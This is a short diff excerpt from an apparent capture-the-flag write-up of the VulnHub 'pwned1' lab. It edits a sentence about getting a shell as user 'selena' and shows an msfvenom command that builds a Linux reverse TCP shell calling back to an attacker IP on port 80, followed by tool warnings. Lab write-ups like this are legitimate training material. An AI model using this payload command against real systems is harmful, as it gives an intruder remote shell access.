Ha-L0/Ha-L0.github.io/_posts/2023-08-07-[H4]-Proving-Grounds-Play-VULNHUB-pwned1.md

 > Yes it does!
 Our `whoami` command got executed.
 {: .prompt-info }

-Lets generate a simple reverse shell we place on the target and execute with the script to get a shell as user `selena`.
+Lets generate a simple reverse shell we place on the target and then execute with the script to get a shell as user `selena`.
 ```bash
 $ msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.45.186 LPORT=80 -f elf > revshell
 PG::Coder.new(hash) is deprecated.
 Please use keyword arguments instead!
 Called from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/connection_adapters/postgresql_adapter.rb:980:in `new'